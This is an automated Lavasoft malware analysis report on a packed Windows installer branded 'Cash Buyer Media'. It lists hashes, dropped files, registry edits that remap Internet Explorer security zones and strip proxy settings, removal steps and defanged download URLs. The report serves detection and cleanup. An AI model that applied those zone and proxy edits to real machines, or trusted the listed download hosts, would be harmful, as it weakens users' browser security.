SearchProtectToolbar_pcap.YR (Lavasoft MAS)Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 46fc3421f4adad3425ab6ef32d0c4355
SHA1: 5504bfa51de599a7235db39c8a45f419410a1742
SHA256: 069013029d890dbf847d052b0a8d97dd767486714f90d2cbec90174285448500
SSDeep: 24576:q4ysm2dkoSBaU9jILdudWwt684PHRql4llRD/NnI:0sLXhU9jIIdZ8PlRu
Size: 891496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Cash Buyer Media
Created at: 2014-11-29 18:26:06
Analyzed on: WindowsXP SP3 32-bit
Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
%original file name%.exe:928
%original file name%.exe:312
%original file name%.exe:580
The Malware injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:928 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\149\arcadetwist_playthru_pcprocleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.psd (42457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\knockout.js (2039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\SsaBz1bCz1Ttz1fGhI67jKCcLl67aBuVXx (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\lua51.dll (3579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\save.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\kLoPVvrSyZOofGUugHSsEez1.dll (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\back.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\29pXHmrN9h.dll (1486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\yZvWSsXxcDUukLwXNnrSdEbC90vWFf90iJ.dll (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\main.css (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\.DS_Store (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_bg.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progressPause.gif (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\close.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iconChe.gif (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\knockout-2.js (10370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\173\tidynetwork_playthru_propccleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\177\tidy_playthru_onesystemcare_triple_628_3.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\do_tracking_hit.lua (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\default_logo.png (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\decline.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\run.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\169\knctr_playthru_tidy_triple_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreenParamete.js (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\AutoFeatureMod.js (386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\153\arcadetwist_knctr_playthru_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.js (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\index.html (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_off.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress.gif (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\145\arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin.zip (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\next.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skipall.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wbk2.tmp (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress-bar.gif (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_on.png (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\minify.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\jquery.js (1843 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\183\playthru_tidy_double_628_3.mht (8844 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\161\knctr_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\adknowledge_3.mht (7772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\cancel.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept-lg.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\181\onesystemcare_tidy_double628.mht (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1Oz0QVgBf.dll (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\141\arcadetwist_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\165\knctr_playthru_tidy_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\options.json (197 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wbk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\AutoFeatureMod.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iconChe.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\knockout-2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreenParamete.js (0 bytes)
Registry activity
The process %original file name%.exe:928 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015121520151216\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 BE 6A CC A6 4A 4A 0C C7 50 E3 D2 B7 C4 44 41"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015121520151216]
"CachePrefix" = ":2015121520151216:"
The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Malware deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]
The Malware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:312 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 0C D6 82 80 F3 1F DB 9C 1E 51 DF 00 E8 56 52"
The process %original file name%.exe:580 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 40 80 AB 58 96 43 CE E9 74 B9 5C 37 B5 81 24"
Dropped PE files
MD5 | File path |
---|---|
a55240c71fbcfa83273a3b853e323b38 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\1Oz0QVgBf.dll |
ef9b5304e4469137c5290b70ef0b7ec9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\29pXHmrN9h.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\kLoPVvrSyZOofGUugHSsEez1.dll |
f0c59526f8186eadaf2171b8fd2967c1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\lua51.dll |
44dac7f87bdf94d553f8d2cf073d605d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\h0nthn80NmAxFi2CggC\yZvWSsXxcDUukLwXNnrSdEbC90vWFf90iJ.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:928
%original file name%.exe:312
%original file name%.exe:580 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\149\arcadetwist_playthru_pcprocleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.psd (42457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\knockout.js (2039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\SsaBz1bCz1Ttz1fGhI67jKCcLl67aBuVXx (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\lua51.dll (3579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\save.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\kLoPVvrSyZOofGUugHSsEez1.dll (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\back.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\29pXHmrN9h.dll (1486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\yZvWSsXxcDUukLwXNnrSdEbC90vWFf90iJ.dll (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\main.css (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\.DS_Store (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_bg.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progressPause.gif (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\close.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iconChe.gif (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\knockout-2.js (10370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\173\tidynetwork_playthru_propccleaner_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\177\tidy_playthru_onesystemcare_triple_628_3.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\do_tracking_hit.lua (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\default_logo.png (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\decline.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\run.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\169\knctr_playthru_tidy_triple_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreenParamete.js (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\AutoFeatureMod.js (386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\153\arcadetwist_knctr_playthru_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\common.js (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\index.html (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_off.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skin.png (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress.gif (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\145\arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin.zip (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\next.png (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\skipall.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\wbk2.tmp (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\progress-bar.gif (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\step_on.png (999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\minify.png (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\res\jquery.js (1843 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\183\playthru_tidy_double_628_3.mht (8844 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\161\knctr_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1\adknowledge_3.mht (7772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\cancel.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\assets\accept-lg.png (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\181\onesystemcare_tidy_double628.mht (9476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\1Oz0QVgBf.dll (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\141\arcadetwist_playthru_onesystemcare_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\165\knctr_playthru_tidy_updateadmin_628.mht (10204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\h0nthn80NmAxFi2CggC\skin\options.json (197 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Cash Buyer Media
Product Name: Cash Buyer Media
Product Version: 61.6.7.6620
Legal Copyright: Copyright (C) 2015
Legal Trademarks:
Original Filename: setup.exe
Internal Name: setup.exe
File Version: 61.6.7.6620
File Description: Cash Buyer Media
Comments:
Language: English (United States)
Company Name: Cash Buyer MediaProduct Name: Cash Buyer MediaProduct Version: 61.6.7.6620Legal Copyright: Copyright (C) 2015Legal Trademarks: Original Filename: setup.exeInternal Name: setup.exeFile Version: 61.6.7.6620File Description: Cash Buyer MediaComments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 53435 | 53760 | 4.46112 | 59445157f5b2aa9117c7ab9d4fab4baf |
.rdata | 61440 | 7748 | 8192 | 3.72529 | 5d0d3053677fc3822c5caecd2b9d6e2d |
.data | 69632 | 16284 | 12800 | 5.23114 | ced9c3e2e405f9ce97f0b5abec5b067d |
.rsrc | 86016 | 6920 | 7168 | 3.1693 | be528cfb1576d557d291904a2817b4e2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 21
28e04d9304a40f4654399ff8bd406528
05ce7a30aaa73986f6175f1ec3063381
914aeced31a748ff736945dd89e80683
32cf0ca303132382c6d7a575bb65c79a
160d218058b4de50d3975e0c72d17a9a
dd36df1879f9e8a29fcd9a5e82e2c09b
e9cebfc61732d61a95008ffe0a2373c1
93c573a93423839523947db83e3a227e
062a97c1f3e5d91b2d662e01bb710f66
d76cab50bef037351746861d136bdfdc
8c028a1350f234e392f4cc6a63b6241e
b0a4f8a1c3e7601844c0cec45cde4a3f
2ed6d7582da9538f6436236c84891326
9dd75b71bce38735d459809145dbaeb4
ed600a82f00b65783c6e937895bf31eb
512cfd63104eb5517b581e96010840fd
6c448b6aabfddbba047906a46fd67e12
a5b76c7bf90af9d129ab5706e53816c7
0126773c0afe3075a5eb88e644f4cc2e
7fcfd59f62c968eae2f720f8d1e685af
b746529eaf8ce8aa07bdad4b3bc5562b
Network Activity
URLs
URL | IP |
---|---|
hxxp://service.downloadadmin.com/checksuminstall?checksum=17679 | 50.22.63.140 |
hxxp://a728.g.akamai.net/skins/da/11122015/megazord_darkskin_nondlm_cancel.zip | |
hxxp://service.downloadadmin.com/env?browserVersion=11&osVersion=7&browserName=IE&c=fw35&variation=&pid=adknowledge&aid=adk&country=US&productKey=&s=fw35_300x250display5128768&brand=adknowledge.com&bc=1197303&osName=Windows | 50.22.63.140 |
hxxp://a728.g.akamai.net/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht | |
hxxp://a728.g.akamai.net/binstallers/BM2/api/do_tracking_hit.lua | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_playthru_onesystemcare_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_playthru_pcprocleaner_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/arcadetwist_knctr_playthru_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/knctr_playthru_onesystemcare_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/knctr_playthru_tidy_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/knctr_playthru_tidy_triple_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/tidynetwork_playthru_propccleaner_updateadmin_628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/tidy_playthru_onesystemcare_triple_628_3.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/onesystemcare_tidy_double628.mht | |
hxxp://a728.g.akamai.net/products/BM2/combos/playthru_tidy_double_628_3.mht | |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/onesystemcare_tidy_double628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/knctr_playthru_tidy_triple_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/playthru_tidy_double_628_3.mht | 213.133.184.112 |
